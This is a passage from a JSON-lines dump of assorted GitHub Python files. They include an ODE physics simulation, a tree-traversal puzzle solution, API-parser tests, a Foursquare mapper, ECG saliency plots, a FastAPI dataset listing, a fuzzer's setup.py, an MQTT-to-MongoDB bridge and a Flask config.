28, 28))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZZy979/pytorch-tutorial","sub_path":"dlwizard/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"78"} +{"seq_id":"18707042144","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nMb = 0.7 #Mass of Body [Kg]\nMp = 0.01 #Mass of Pad [Kg]\ng = 1.622 #Gravitational Acceleration [m/s^2] \nk1 = 1.4 #Bias Spring Coefficient [N/mm]\nl0 = 100 #Natural Length of Bias Spring [mm]\nk2 = 10 #Spring Coefficient of the ground [N/mm]\nc2 = 10 #Damping Coefficient [Ns/mm]\nZ20 = 0.0 #Initial Position of Pad [mm]\nDZ = 50 #Initial Deflextion of Bias Spring [mm]\n\ndef func1(x, t):\n return [x[1], (k1/Mb)*(l0-(x[0]-x[2]))-g, x[3], (k1/Mp)*(l0-(x[0]-x[2])\\\n\t)-(k2/Mp)*(x[2]-Z20)-(c2/Mp)*x[3]-g]\n\ndef func2(x, t):\n return [x[1], (k1/Mb)*(l0-(x[0]-x[2]))-g, x[3], (k1/Mp)*(l0-(x[0]-x[2])\\\n\t)-(k2/Mp)*(x[2]-Z20)-g]\n\ndef main():\n\tx0 = [l0-DZ, 0, 0, 0]\n\tt = np.arange(0, 10, 0.01)\n\n\tx = odeint(func1, x0, t)\n\tZ_cg = Mb/(Mb+Mp)*x[:,0]\n\tV_cg = Mb/(Mb+Mp)*x[:,1] \n\n\tprint(x)\n\tprint(np.max(V_cg))\n\tprint(np.argmax(V_cg))\n\tprint(x[10,:])\n\tindex = np.where((x[:,3]>=-0.01)&(x[:,3]<=-0.001))\n\tprint(index)\n\t#fig = plt.figure()\n\tplt.plot(t,x[:,0], label=\"Position:Body\")\n\tplt.plot(t,x[:,1], label=\"Velocity:Body\")\n\tplt.plot(t,x[:,2], label=\"Position:Pad\")\n\tplt.plot(t,x[:,3], label=\"Velocity:Pad\")\n\tplt.plot(t,Z_cg, label=\"Position:COG\")\n\tplt.plot(t,V_cg, label=\"Velocity:COG\")\n\t#ax = fig.gca(projection='3d')\n\t#ax.plot(v[:, 0], v[:, 1], v[:, 2])\n\tplt.legend()\n\tplt.show()\nif __name__ == '__main__':\n\t\tmain()\n","repo_name":"LukaDvlp/SMAHopping","sub_path":"1D_jump.py","file_name":"1D_jump.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15682788130","text":"import sys\ninput = sys.stdin.readline\nN = int(input())\nT = list(map(int, input().split()))\nCBT = [[] for _ in range(N)]\n\ndef InOrder(list, x):\n mid = (len(list)//2)\n CBT[x].append(list[mid])\n if len(list) == 1:\n return\n InOrder(list[:mid], x+1)\n InOrder(list[mid+1:], x+1)\n\nInOrder(T, 0)\nfor i in range(N):\n print(*CBT[i])\n\n\"\"\" 9934\n전위 순회 : 루트 - 왼쪽 자식 - 오른쪽 자식\n중위 순회 : 왼쪽 자식 - 루트 - 오른쪽 자식\n후위 순회 : 왼쪽 자식 - 오른쪽 자식 - 루트\n\n상근이는 중위 순회로 빌딩들을 방문하여 종이에 적었다.\n\"\"\"\n","repo_name":"Jihyun-Choi/Algorithm","sub_path":"BOJ/python/data_structures/9934.py","file_name":"9934.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5681462207","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nimport os\nimport pandas as pd\nfrom avstockparser import AVStockParser\n\n\nclass TestBaseMethods:\n\n @pytest.fixture(scope='function', autouse=True)\n def init(self):\n AVStockParser.uLogger.level = 50 # Disable debug logging while test, logger CRITICAL = 50\n AVStockParser.uLogger.handlers[0].level = 50 # Disable debug logging for STDOUT\n # AVStockParser.uLogger.handlers[1].level = 50 # Disable debug logging for log.txt\n # set up default parameters:\n self.reqURL = r\"https://www.alphavantage.co/query?\"\n self.apiKey = \"demo\"\n self.ticker = \"IBM\" # used for demo test\n self.retry = 2\n\n def test_ParserReturnPandasDataframe(self):\n testData = [\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": None,\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_INTRADAY\",\n \"interval\": \"5min\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": None,\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_DAILY\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n ]\n for test in testData:\n result = AVStockParser.AVParseToPD(**test)\n assert isinstance(result, pd.DataFrame) is True, \"Expected Pandas DataFrame result output!\"\n\n def test_ParserCreateOutputFile(self):\n testData = [\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": os.path.abspath(\"tests/ibm_5min.csv\"),\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_INTRADAY\",\n \"interval\": \"5min\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": os.path.abspath(\"tests/ibm_daily.csv\"),\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_DAILY\",\n \"size\": \"full\",\n \"retry\": self.retry,\n },\n ]\n for test in testData:\n AVStockParser.AVParseToPD(**test)\n assert os.path.exists(test[\"output\"]), \"Output file must be created after parser work finished!\"\n\n def test_Render(self):\n test = {\n \"reqURL\": self.reqURL,\n \"apiKey\": self.apiKey,\n \"output\": None,\n \"ticker\": self.ticker,\n \"period\": \"TIME_SERIES_DAILY\",\n \"size\": \"full\",\n \"retry\": self.retry,\n }\n parsedData = AVStockParser.AVParseToPD(**test)\n AVStockParser.Render(prices=parsedData, name=\"TEST\", show=False)\n assert os.path.exists(os.path.abspath(\"index.html\")), \"index.html file must be created!\"\n assert os.path.exists(os.path.abspath(\"index.html.md\")), \"index.html.md file must be created!\"\n","repo_name":"Tim55667757/AVStockParser","sub_path":"tests/test_AVStockParser.py","file_name":"test_AVStockParser.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4940060554","text":"from OPENiapp.Providers.base.activity import bcActivity\nfrom OPENiapp.Providers.base.common import *\n\nclass foActivity(bcActivity):\n \"\"\" This class is used to:\n 1. Get a Foursquare Event\n \"\"\"\n # region Activity API\n # As described here: https://opensourceprojects.eu/p/openi/wiki/Activity_API\n \n # region Event Object\n # As described here: https://opensourceprojects.eu/p/openi/wiki/Event_Mapping\n \n def get_event(self, id):\n \"\"\" GET API_PATH/[EVENT_ID] \"\"\"\n # /event_id (ie /4e173d2cbd412187aabb3c04)\n raw_data = self.connector.events(id)\n \n names = ['id', 'object_type', 'service', 'resource_uri', 'from_id', 'from_object_type', 'from_resource_uri', 'from_name', 'time_created_time', 'time_edited_time', 'time_deleted_time']\n names.extend(['place_name', 'place_description', 'place_category', 'place_picture', 'place_address_street', 'place_address_number', 'place_address_apartment', 'place_address_city', 'place_address_locality', 'place_address_country', 'place_address_zip', 'place_location_latitude', 'place_location_longitude', 'place_location_height'])\n names.extend(['duration_starts_time', 'duration_ends_time'])\n names.extend(['description', 'picture', 'title'])\n\n fields = ['id', 'object_type', 'service', 'url', 'owner.id', 'owner.category', 'owner.url', 'owner.name', 'time.created_time', 'time.edited_time', 'time.deleted_time']\n fields.extend(['location', '', '', '', '', '', '', '', '', '', '', 'venue.latitude', 'venue.longitude', ''])\n fields.extend(['startAt', 'endAt'])\n fields.extend(['description', 'picture', 'name'])\n\n alternatives = ['', 'event', 'foursquare', '', '', '', '', '', '', '', '']\n alternatives.extend(['', '', '', '', '', '', '', '', '', '', '', '', '', ''])\n alternatives.extend(['', ''])\n alternatives.extend(['', '', ''])\n\n data = self.get_fields(raw_data['event'], names, fields, alternatives)\n response = {\n 'meta': {\n 'limit': self.check_if_exists(raw_data, 'limit', None),\n 'next': self.check_if_exists(raw_data, 'paging.next', None),\n 'offset': self.check_if_exists(raw_data, 'offset', 0),\n 'previous': self.check_if_exists(raw_data, 'paging.previous', None),\n 'total_count': self.check_if_exists(raw_data, 'total_count', 1)\n },\n 'objects': [self.format_event_response(data)]\n }\n \n venue_id = self.check_if_exists(raw_data, 'event.venueId')\n if (venue_id != defJsonRes):\n raw_data2 = self.connector.venues(venue_id)\n response['objects'][0]['place']['name'] = self.check_if_exists(raw_data2, 'venue.name', '')\n response['objects'][0]['place']['description'] = self.check_if_exists(raw_data2, 'venue.description', '')\n response['objects'][0]['place']['category'] = self.check_if_exists(raw_data2, 'venue.categories', '')\n response['objects'][0]['place']['picture'] = self.check_if_exists(raw_data2, 'venue.photos', '')\n response['objects'][0]['place']['address']['street'] = self.check_if_exists(raw_data2, 'venue.location.address', '')\n response['objects'][0]['place']['address']['number'] = self.check_if_exists(raw_data2, 'venue.location.number', '')\n response['objects'][0]['place']['address']['apartment'] = self.check_if_exists(raw_data2, 'venue.location.apartment', '')\n response['objects'][0]['place']['address']['city'] = self.check_if_exists(raw_data2, 'venue.location.city', '')\n response['objects'][0]['place']['address']['locality'] = self.check_if_exists(raw_data2, 'venue.location.locality', '')\n response['objects'][0]['place']['address']['country'] = self.check_if_exists(raw_data2, 'venue.location.country', '')\n response['objects'][0]['place']['address']['zip'] = self.check_if_exists(raw_data2, 'venue.location.postalCode', '')\n response['objects'][0]['place']['address']['latitude'] = self.check_if_exists(raw_data2, 'venue.location.lat', '')\n response['objects'][0]['place']['address']['longitude'] = self.check_if_exists(raw_data2, 'venue.location.lng', '')\n response['objects'][0]['place']['address']['height'] = self.check_if_exists(raw_data2, 'venue.location.height', '')\n\n return response\n\n def get_checkins(self):\n \"\"\" GET API_PATH/CHECKIN \"\"\"\n # / (ie /)\n raw_datas = self.connector.users.checkins()\n \n names = ['id', 'object_type', 'service', 'resource_uri', 'from_id', 'from_object_type', 'from_resource_uri', 'from_name', 'time_created_time', 'time_edited_time', 'time_deleted_time']\n names.extend(['place_name', 'place_description', 'place_category', 'place_picture', 'place_address_street', 'place_address_number', 'place_address_apartment', 'place_address_city', 'place_address_locality', 'place_address_country', 'place_address_zip', 'place_location_latitude', 'place_location_longitude', 'place_location_height'])\n names.extend(['text'])\n\n fields = ['id', 'type', 'service', 'url', 'owner.id', 'owner.category', 'owner.url', 'owner.name', 'createdAt', 'time.edited_time', 'time.deleted_time']\n fields.extend(['venue.name', '', 'venue.categories', 'photos', 'venue.location.address', '', '', 'venue.location.city', 'venue.location.state', 'venue.location.country', 'venue.location.posalCode', 'venue.location.lat', 'venue.location.lng', ''])\n fields.extend(['shout'])\n\n alternatives = ['', 'checkin', 'foursquare', '', '', '', '', '', '', '', '']\n alternatives.extend(['', '', '', '', '', '', '', '', '', '', '', '', '', ''])\n alternatives.extend([''])\n\n data = self.get_fields(raw_datas['checkins'], names, fields, alternatives)\n response = {\n 'meta': {\n 'limit': self.check_if_exists(raw_datas, 'limit', None),\n 'next': self.check_if_exists(raw_datas, 'paging.next', None),\n 'offset': self.check_if_exists(raw_datas, 'offset', 0),\n 'previous': self.check_if_exists(raw_datas, 'paging.previous', None),\n 'total_count': len(raw_datas['checkins']['items'])\n },\n 'objects': []\n }\n for raw_data in raw_datas['checkins']['items']:\n data = self.get_fields(raw_data, names, fields, alternatives)\n response['objects'].append(self.format_checkin_response(data))\n\n return response\n \n # region Connections\n\n\n # endregion Connections\n\n # endregion Event Object\n\n # endregion Activity API","repo_name":"OPENi-ict/api-framework","sub_path":"OPENiapp/OPENiapp/Providers/Foursquare/_foactivity.py","file_name":"_foactivity.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2560806795","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom tensorflow.keras.utils import to_categorical\nfrom analyse_ml_results import analyse_results\nfrom tensorflow.keras.models import Model\nfrom numpy import expand_dims\nfrom vis.visualization import visualize_saliency\nfrom vis.visualization import visualize_activation\nfrom tensorflow.keras import activations\nfrom vis.utils import utils\nfrom scipy.signal import butter, lfilter, freqz\nfrom scipy import signal\nfrom ecg_feature_extraction import feature_extract_ecg\nimport sys\nimport glob\nimport time\nimport gc\nimport pandas as pd\n\n# N\t\tNormal beat (displayed as \"·\" by the PhysioBank ATM, LightWAVE, pschart, and psfd)\n# L\t\tLeft bundle branch block beat\n# R\t\tRight bundle branch block beat\n# B\t\tBundle branch block beat (unspecified)\n# A\t\tAtrial premature beat\n# a\t\tAberrated atrial premature beat\n# J\t\tNodal (junctional) premature beat\n# S\t\tSupraventricular premature or ectopic beat (atrial or nodal)\n# V\t\tPremature ventricular contraction\n# r\t\tR-on-T premature ventricular contraction\n# F\t\tFusion of ventricular and normal beat (not included)\n# e\t\tAtrial escape beat\n# j\t\tNodal (junctional) escape beat\n# n\t\tSupraventricular escape beat (atrial or nodal)\n# E\t\tVentricular escape beat\n# /\t\tPaced beat\n# f\t\tFusion of paced and normal beat (not included)\n\nclass_names = ['A','E','j','L','N','P','R','V']\n\ndef focal_loss(gamma=2., alpha=4.):\n\n gamma = float(gamma)\n alpha = float(alpha)\n\n def focal_loss_fixed(y_true, y_pred):\n \"\"\"Focal loss for multi-classification\n FL(p_t)=-alpha(1-p_t)^{gamma}ln(p_t)\n Notice: y_pred is probability after softmax\n gradient is d(Fl)/d(p_t) not d(Fl)/d(x) as described in paper\n d(Fl)/d(p_t) * [p_t(1-p_t)] = d(Fl)/d(x)\n Focal Loss for Dense Object Detection\n https://arxiv.org/abs/1708.02002\n\n Arguments:\n y_true {tensor} -- ground truth labels, shape of [batch_size, num_cls]\n y_pred {tensor} -- model's output, shape of [batch_size, num_cls]\n\n Keyword Arguments:\n gamma {float} -- (default: {2.0})\n alpha {float} -- (default: {4.0})\n\n Returns:\n [tensor] -- loss.\n \"\"\"\n epsilon = 1.e-9\n y_true = tf.convert_to_tensor(y_true, tf.float32)\n y_pred = tf.convert_to_tensor(y_pred, tf.float32)\n\n model_out = tf.add(y_pred, epsilon)\n ce = tf.multiply(y_true, -tf.math.log(model_out))\n weight = tf.multiply(y_true, tf.pow(tf.subtract(1., model_out), gamma))\n fl = tf.multiply(alpha, tf.multiply(weight, ce))\n reduced_fl = tf.reduce_max(fl, axis=1)\n return tf.reduce_mean(reduced_fl)\n return focal_loss_fixed\n\n#Function which normalizes the ECG signal\ndef normalize(ecg_signal):\n max_value = max(ecg_signal)\n min_value = min(ecg_signal)\n\n range_values = max_value - min_value\n\n if range_values == 0:\n return ecg_signal\n\n normalised = [(x - min_value)/range_values for x in ecg_signal]\n\n return [a * -50 for a in normalised]\n #return [np.float32(a) for a in normalised]\n\nmodel_location = 'saved_models\\\\cnn_hannun\\\\cnn_model'\nmodel = tf.keras.models.load_model(model_location)\n#model = tf.keras.models.load_model(model_location, custom_objects={'focal_loss_fixed': focal_loss()})\n\nprint(model.summary())\n\ntwo_leads = 1\n\nfilename = \"./mit_bih_processed_data_two_leads_r_marker/A/ecg_7.txt\"\nf = open(filename, \"r\")\necg = []\nfor i,line in enumerate(f):\n line = line.replace(\"\\n\",\"\")\n #ECG signal stored in first line separated by spaces\n if i < 1:\n line_segments = line.split()\n\n r_value = line_segments[-1]\n r_value = int(r_value)\n del line_segments[-1]\n\n if two_leads == 0:\n line_segments = line_segments[:430]\n line_segments = [float(x) for x in line_segments]\n\n for item in line_segments:\n ecg.append(item)\nf.close()\n\necg_original = ecg.copy()\n\n#make one lead\n#ecg = ecg[:430]\n\ncutoff = 90\norder = 5\nfs = 360.0\n\n#ecg_plot_filtered = butter_highpass_filter(ecg, cutoff, fs, order)\n#ecg_plot_filtered = butter_lowpass_filter(ecg, cutoff, fs, order)\necg_plot_filtered = normalize(ecg)\n\nplt.plot(ecg)\nplt.plot(ecg_plot_filtered)\nplt.title(\"Raw ECG\")\nplt.legend(['Original','Filtered'])\nplt.figure()\n\necg = [np.asarray(item) for item in ecg]\necg_plot_filtered = np.array(ecg_plot_filtered)\n\necg = np.array(ecg)\n\necg = ecg[:, np.newaxis]\necg = expand_dims(ecg, axis=0)\n\n# feature_maps = model.predict(ecg)\n# square = 20\n# for map_index,fmap in enumerate(feature_maps):\n# plt.suptitle(\"Feature Map, Layer \"+str(ixs[map_index]))\n# ix = 1\n# for _ in range(square):\n# ax = plt.subplot(square,1,ix)\n# ax.set_xticks([])\n# ax.set_yticks([])\n# plt.imshow(fmap[:,ix-1],cmap='gray')\n# ix += 1\n# plt.figure()\n\nfig, ax = plt.subplots(figsize=(18,2))\n\nsegment_names = [\"-A12\",\"-A11\",\"-A10\",\"-A9\",\"-A8\",\"-A7\",\"-A6\",\"-A5\",\"-A4\",\"-A3\",\"-A2\",\"-A1\",\"+A1\",\"+A2\",\"+A3\",\"+A4\",\"+A5\",\"+A6\",\"+A7\",\"+A8\",\"+A9\",\"+A10\",\"+A11\",\"+A12\",\"-B12\",\"-B11\",\"-B10\",\"-B9\",\"-B8\",\"-B7\",\"-B6\",\"-B5\",\"-B4\",\"-B3\",\"-B2\",\"-B1\",\"+B1\",\"+B2\",\"+B3\",\"+B4\",\"+B5\",\"+B6\",\"+B7\",\"+B8\",\"+B9\",\"+B10\",\"+B11\",\"+B12\"]\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_j.csv\")\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#4a86e8\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#4a86e8\")\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_correct_j_predictions.csv\")\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#9900ff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#9900ff\")\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_incorrect_j_predictions.csv\")\ncounts = df_file.iloc[-4]\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\ncounts = counts.values.tolist()\ndel counts[0]\ncounts = [int(x) for x in counts]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#00ffff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#00ffff\")\n\nplt.legend([\"Total\",\"Correct\",\"Incorrect\"])\n\nlabel_names = []\nfor index, item in enumerate(segment_names):\n label_names.append(str(item) +\"\\n\"+ str(counts[index]))\n\nplt.xticks(np.arange(0,len(mean_gradients),1),segment_names)\nax.tick_params(axis=\"x\",labelsize=8)\nplt.title(\"Median Values and 25% - 75% Quartile Per Segment, Junctional Escape Beats\")\nplt.figure()\n\nfig, ax = plt.subplots(figsize=(18,2))\nplt.plot(mean_gradients, color=\"#00ffff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#00ffff\")\n\nlabel_names = []\nfor index, item in enumerate(segment_names):\n label_names.append(str(item) +\"\\n\"+ str(counts[index]))\n\nplt.xticks(np.arange(0,len(mean_gradients),1),segment_names)\nax.tick_params(axis=\"x\",labelsize=8)\nplt.title(\"Median Values and 25% - 75% Quartile Per Segment, Incorrect Junctional Escape Beats vs Normal Beats\")\n\ndf_file = pd.read_csv(\"C:/Users/yolaj/Dropbox/PhD/My Papers/IEEE BIBE/csv files/segments_N.csv\")\nmean_gradients = df_file.iloc[-3]\nlower_quantile = df_file.iloc[-2]\nupper_quantile = df_file.iloc[-1]\n\nmean_gradients = mean_gradients.values.tolist()\ndel mean_gradients[0]\nmean_gradients = [float(x) for x in mean_gradients]\n\nlower_quantile = lower_quantile.values.tolist()\ndel lower_quantile[0]\nlower_quantile = [float(x) for x in lower_quantile]\n\nupper_quantile = upper_quantile.values.tolist()\ndel upper_quantile[0]\nupper_quantile = [float(x) for x in upper_quantile]\n\nplt.plot(mean_gradients, color=\"#9900ff\")\nplt.fill_between(np.arange(0,len(mean_gradients),1), lower_quantile, upper_quantile, alpha=0.1, facecolor=\"#9900ff\")\n\nplt.legend([\"Incorrectly Identified Junctional Escape Beats\",\"Normal Beats\"])\nplt.show()\n\ninterval = int(0.1 * 360) #0.1 seconds * sampling rate \n\nmean_values_a = []\nsegments_a = []\n\nend_index = r_value\nstart_column = \"-A\"\ni = 1\nwhile end_index > 0:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_a.append(mean_value)\n \n start_index = end_index - interval\n\n if start_index < 0:\n start_index = 0\n segments_a.append([start_index, end_index])\n\n end_index = start_index\n\n i += 1\n\nmean_values_a.reverse()\nsegments_a.reverse()\n\nstart_index = r_value\nstart_column = \"+A\"\ni = 1\nwhile start_index < 430:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_a.append(mean_value)\n \n end_index = start_index + interval\n\n if end_index > 430:\n end_index = 430\n segments_a.append([start_index, end_index])\n\n start_index = end_index\n\n i += 1\n\nmean_values_b = []\nsegments_b = []\n\nend_index = r_value\nstart_column = \"-B\"\ni = 1\nwhile end_index > 0:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_b.append(mean_value)\n \n start_index = end_index - interval\n\n if start_index < 0:\n start_index = 0\n segments_b.append([start_index+430, end_index+430])\n\n end_index = start_index\n\n i += 1\n\nmean_values_b.reverse()\nsegments_b.reverse()\n\nstart_index = r_value\nstart_column = \"+B\"\ni = 1\nwhile start_index < 430:\n\n column = start_column + str(i)\n mean_value = mean_gradients[column]\n mean_value = float(mean_value)\n\n mean_values_a.append(mean_value)\n \n end_index = start_index + interval\n\n if end_index > 430:\n end_index = 430\n segments_b.append([start_index+430, end_index+430])\n\n start_index = end_index\n\n i += 1\n\nfor item in mean_values_b:\n mean_values_a.append(item)\n\nfor item in segments_b:\n segments_a.append(item)\n\nupsampling_factor = 25\n\nplot_grads = []\nfor index,item in enumerate(segments_a):\n\n mean_value = mean_values_a[index]\n\n start = item[0]\n end = item[1]\n\n if end == 860:\n end = 859\n #to make the plotting line segments happy, when I get to the end it plots to 860 and doesn't overflow\n\n print(start)\n print(end)\n print()\n\n plt.plot(np.arange(start,end+1,1),ecg_original[start:end+1],color=plt.cm.nipy_spectral(mean_value))\n\ncmap = plt.cm.ScalarMappable(cmap=plt.cm.nipy_spectral)\nfig.colorbar(cmap)\n\nplt.title(\"Saliency Map - Average Contribution Per Feature (Premature Ventricular Contraction)\")\nplt.grid(which='both')\nplt.minorticks_on()\n\nplt.show()","repo_name":"jonesy30/ECGClassification","sub_path":"plot_saliency_by_interval.py","file_name":"plot_saliency_by_interval.py","file_ext":"py","file_size_in_byte":11965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19949789915","text":"from typing import Optional, Iterable\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI\nfrom mtdata.entry import lang_pair\nfrom mtdata.index import Index, get_entries\nfrom mtdata.iso.bcp47 import bcp47, BCP47Tag\n\n\ndatasets = {str(entry.did): entry for entry in get_entries()}\n\n\napp = FastAPI()\n\n\nclass Entry(BaseModel):\n id: str\n group: str\n name: str\n version: str\n langs: List[str]\n\n\n@app.get(\"/datasets/by-language\")\n@app.get(\"/datasets/by-language/{lang1}\")\ndef list_languages(lang1:str = None) -> Iterable[str]:\n langs: set[str] = set()\n filter_lang = bcp47(lang1) if lang1 is not None else None\n for entry in Index.get_instance().get_entries():\n if filter_lang is not None and filter_lang not in entry.did.langs:\n continue\n langs.update(*entry.did.langs)\n return sorted(lang for lang in langs if lang is not None)\n\n\n@app.get(\"/datasets/by-language/{langs}\")\ndef list_datasets(langs:str) -> Iterable[Entry]:\n return (\n Entry(\n id = str(entry.did),\n group = entry.did.group,\n name = entry.did.name,\n version = entry.did.version,\n langs = entry.did.langs\n ) for entry in get_entries(lang_pair(langs))\n )\n\n\n@app.get(\"/datasets/{did}\")\ndef read_dataset(did: str):\n return datasets[did].did\n\n\n@app.get(\"/datasets/{did}/sample\")\ndef read_dataset(did: str):\n return datasets[did].did\n","repo_name":"miau1/empty-train","sub_path":"mtdata-stuff.py","file_name":"mtdata-stuff.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"7549427997","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pythonfuzz\",\n version=\"1.0.10\",\n author=\"GitLab B.V.\",\n description=\"Coverage-guided fuzz testing for Python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=[\n # WARNING: Keep these values in line with those in requirements.txt\n \"psutil==5.6.3\",\n \"functools32==3.2.3.post2; python_version < '3'\",\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Software Development :: Testing\"\n ],\n python_requires='>=3.5.3',\n packages=setuptools.find_packages('.', exclude=(\"examples\",))\n)\n","repo_name":"otter-sec/vyper-fuzz","sub_path":"pythonfuzz/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"24031119961","text":"\"\"\"nearal development configuration.\"\"\"\n\nimport pathlib\n\n# Root of this application, useful if it doesn't occupy an entire domain\nAPPLICATION_ROOT = '/'\n\n# Secret key for encrypting cookies\nSECRET_KEY = b'\\xd8\\x85\\r2\"R_\\xd1\\xcc\\xf8K\\xa9*\\xe894\\x84\\xbd;\\xb3rMr+'\nSESSION_COOKIE_NAME = 'login'\n\n# File Upload to var/uploads/\nNEARAL_ROOT = pathlib.Path(__file__).resolve().parent.parent\nUPLOAD_FOLDER = NEARAL_ROOT/'var'/'uploads'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nMAX_CONTENT_LENGTH = 16 * 1024 * 1024\n\n","repo_name":"XinyunShen/advertisement-webpage","sub_path":"nearal/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74267903943","text":"# Read the Data from RPi Publisher (mqtt_pub.py) and pushes the data to MongoDB Server\n# Run this program on AWS Machine only\n\nimport paho.mqtt.client as mqtt\nfrom pymongo import MongoClient\n\n# create a client to connect with MongoDB Server\nmc=MongoClient('localhost',27017)\n\n# Connect with databse\ndb=mc['iotnitw']\n\n# Connect with collection\nc=db['sensorValues']\n\nbroker='172.31.29.90' # my private broker (change it to your private ip)\nport=1883\ntopic='nitw/iot'\n\n# create a client object\nclient=mqtt.Client()\n\n# connect with broker\nclient.connect(broker,port)\nprint('Broker Connected')\nid=1000\n\n# Subscribe\nclient.subscribe(topic)\n\n# notification\ndef mom(client,userdata,msg): # msg - {key:value} - {payload: your_msg}\n global id\n t=(msg.payload) # msg - object (rocket), payload - key holding a value (data)\n t=t.decode('utf-8')\n print(t)\n id+=1\n k={'_id':id,'moisture_sensor':t}\n c.insert_one(k)\n print('Document Inserted')\n\n# configure the notification\nclient.on_message=mom\n\n# execute this subscribe on an infinte loop\nclient.loop_forever()\n","repo_name":"maddydevgits/Dec20-NIT-W-FDP-Session","sub_path":"mqtt_sub_aws.py","file_name":"mqtt_sub_aws.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38970771840","text":"'''\nCreate a class called Employ have the data members empid, name\nDefined the display()\n\nSub class the Employ – call it as EmpDetails – have data members email Id, mobile number\n\nDefine the method emp_details_display()\n\nAgain sub class EmpDetails – call it as EmpDeptDetails – have data members – 